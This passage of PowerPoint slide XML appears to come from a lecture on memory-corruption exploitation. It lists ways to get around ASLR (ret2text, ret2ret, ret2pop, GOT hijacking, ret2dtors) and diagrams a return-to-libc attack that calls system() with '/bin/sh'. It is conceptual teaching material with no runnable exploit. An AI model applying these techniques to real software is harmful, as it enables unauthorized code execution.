              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1550421171"/>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a:xfrm>
            <a:off x="457200" y="266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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600" b="1" dirty="0"/>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="1328738"/>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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>
              <a:ext cx="2120900"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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>
              <a:ext cx="2120900"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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688"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ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595875286"/>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ret2libc</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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1449214820"/>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dirty="0" smtClean="0"/>
              <a:t>Many techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45058" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret2bss, ret2data, ret2heap, ret2eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>string pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret2dtors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4114800"/>
            <a:ext cx="6248400" cy="91440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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But ret2libc is the go-to move.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371263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Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="5562600" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite return address by address of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>setup fake return address and argument(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will “call” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Works when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> not rand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>No injected code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2539019150"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6525590" y="2107360"/>
          <a:ext cx="1461558" cy="3715806"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>fake</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t> 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Cambria"/>
                        <a:cs typeface="Cambria"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>fake ret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                          <a:cs typeface="Cambria"/>
                        </a:rPr>
                        <a:t>addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Cambria"/>
                        <a:cs typeface="Cambria"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>caller’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" strike="sngStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" strike="sngStrike" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" strike="sngStrike" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298164" y="1276290"/>
            <a:ext cx="1236236" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Curved Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7877446" y="1665201"/>
            <a:ext cx="718066" cy="471052"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 611"/>
              <a:gd name="adj2" fmla="val 14853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 name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197312091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Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2971800"/>
            <a:ext cx="5562600" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite return address with address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>setup fake return address and argument(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will “call” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>No injected code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</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3336555042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
